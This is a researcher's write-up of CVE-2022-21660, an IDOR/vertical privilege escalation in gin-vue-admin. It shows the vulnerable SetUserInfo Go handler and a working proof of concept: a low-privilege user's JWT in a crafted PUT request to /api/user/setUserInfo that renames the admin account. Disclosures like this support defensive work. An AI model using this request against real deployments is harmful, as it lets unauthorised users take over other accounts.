
CVE-2022-21660
Welcome everyone to give this project a star.```http https://github.com/flipped-aurora/gin-vue-admin/

After finishing the article, applying for a CVE was somewhat troublesome, but fortunately it was granted, and the GitHub staff responded quickly.
> ps Before applying for the CVE, I had already submitted it to CNVD.

### 2. Environment Setup
Follow the official tutorial.```bash
git clone https://github.com/flipped-aurora/gin-vue-admin.git
Then enter the server directory```bash go generate
```bash
go build -o server main.go
Then directly run the server

Then there is WEB, enter the web directory, input```bash cnpm install || npm install
Then just wait

After installation is complete, the web page will open automatically


Then initialize the database configuration

After configuration, click initialize and then log in

### 3. Vulnerability Reproduction
### SetUserInfo has vertical privilege escalation
##### 1. SetUserInfo interface unauthorized setting of user personal information
We directly go to the user management page and add a low-privilege user role

It can be seen that no administrator privileges are given above. Next, create a new account and assign it to this role group.


The vulnerability occurs at line 273 of https://github.com/flipped-aurora/gin-vue-admin/blob/master/server/api/v1/system/sys_user.go
```go
// @Tags SysUser
// @Summary 设置用户信息
// @Security ApiKeyAuth
// @accept application/json
// @Produce application/json
// @Param data body system.SysUser true "ID, 用户名, 昵称, 头像链接"
// @Success 200 {string} string "{"success":true,"data":{},"msg":"设置成功"}"
// @Router /user/setUserInfo [put]
func (b *BaseApi) SetUserInfo(c *gin.Context) {
var user system.SysUser
_ = c.ShouldBindJSON(&user)
if err := utils.Verify(user, utils.IdVerify); err != nil {
response.FailWithMessage(err.Error(), c)
return
}
if err, ReqUser := userService.SetUserInfo(user); err != nil {
global.GVA_LOG.Error("设置失败!", zap.Error(err))
response.FailWithMessage("设置失败", c)
} else {
response.OkWithDetailed(gin.H{"userInfo": ReqUser}, "设置成功", c)
}
}
There is no validation of the incoming ID here; the ID represents the user. Directly passing the specified ID can modify the personal information of the corresponding user.

First, we use the admin's X-token to test modifying the name of the user with ID 1 to test1. Then we can see in the backend that the admin's ID has been changed to test1.

Next, we replace the token with the one from the newly created UzJu_HxSecTeam account and modify the admin username to test2.
First, in the UzJu_HxSecTeam account's personal information > change password, we arbitrarily change the password, then obtain the account token.

This token belongs to the low-privilege role. Normally, a low-privilege user cannot modify any information of the admin.```http x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiYTM1NTRiYmYtYzQwNS00ZWEwLTkzZjQtMzQ1YTRiNzIxMWYxIiwiSUQiOjMsIlVzZXJuYW1lIjoiVXpKdV9IeFNlY1RlYW0iLCJOaWNrTmFtZSI6IlV6SnVfSHhTZWNUZWFtIiwiQXV0aG9yaXR5SWQiOiIxMjM0IiwiQnVmZmVyVGltZSI6ODY0MDAsImV4cCI6MTY0MTQ1MDk5OCwiaXNzIjoicW1QbHVzIiwibmJmIjoxNjQwODQ1MTk4fQ.0vm9DA7RHOi-ZBN6p-C4RIjJS7Qs9kbXKLNpmc6nyDs
We replace the Token into it, constructing the following JSON data.```json
{
"id":1,
"username":"test2",
"nickName":"test2",
"headerImg":""
}

We will replace the Token in the setUserinfo interface.```http PUT /api/user/setUserInfo HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiYTM1NTRiYmYtYzQwNS00ZWEwLTkzZjQtMzQ1YTRiNzIxMWYxIiwiSUQiOjMsIlVzZXJuYW1lIjoiVXpKdV9IeFNlY1RlYW0iLCJOaWNrTmFtZSI6IlV6SnVfSHhTZWNUZWFtIiwiQXV0aG9yaXR5SWQiOiIxMjM0IiwiQnVmZmVyVGltZSI6ODY0MDAsImV4cCI6MTY0MTQ1MDk5OCwiaXNzIjoicW1QbHVzIiwibmJmIjoxNjQwODQ1MTk4fQ.0vm9DA7RHOi-ZBN6p-C4RIjJS7Qs9kbXKLNpmc6nyDs x-user-id: 1 Content-Length: 67 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
{"id":1, "username":"test2", "nickName":"test2", "headerImg":""}
Then we are prompted that the setup was successful

This is when we switch to the admin account to check if it has been changed to test2

It can be seen that the admin user was successfully modified